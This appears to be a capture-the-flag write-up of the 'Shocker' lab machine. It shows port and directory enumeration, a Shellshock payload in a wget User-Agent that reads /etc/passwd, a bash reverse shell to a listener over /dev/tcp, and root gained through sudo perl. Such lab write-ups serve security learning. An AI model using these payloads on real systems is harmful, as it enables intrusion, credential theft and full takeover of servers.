Shocker, while fairly simple overall, demonstrates the severity of the renowned Shellshock exploit, which affected millions of public-facing servers.

Enumeration

At first, I did a Nmap scan for open ports and services.

nmap -sC -sV -p- 10.10.1.235 -oG shocker

|Ports|Service
|80| Apache httpd 2.4.18 ((Ubuntu))
|2222| OpenSSH 7.2p2 Ubuntu 4ubuntu2.2

I visit the website But there is nothing interesting.

I start enumerating websites using FFUF

ffuf -w /usr/share/dirb/wordlists/small.txt:FUZZ -u "http://10.129.1.235/FUZZ" -ic

I found cgi-bin. Next I did directory enumaration using common extention.

ffuf -w /usr/share/dirb/wordlists/small.txt:FUZZ -u "http://10.129.1.235/cgi-bin/FUZZ" -e .sh,.php,.html

I found user.sh.

After opening the file I saw the file is executing in the webserver.

Foothold

After looking for sometime I figureout this is a shellshock vulnerability.

I found the following artical useful. Exploit

Lets see if we can read /etc/passwd.

wget -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" http://10.10.1.235/cgi-bin/user.sh

After opening the file we can see the commands are being executed.

So, I decided to use a bash reverseshell. And after execution I got a connection back.

wget -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/bash -i >& /dev/tcp/10.10.14.37/9000 0>&1" http://10.129.1.235/cgi-bin/user.sh

Privilege Escalation

I check what I can run as sudo.

I can run perl. I checked GTFOBins and used following to get root access.

sudo perl -e 'exec "/bin/bash";'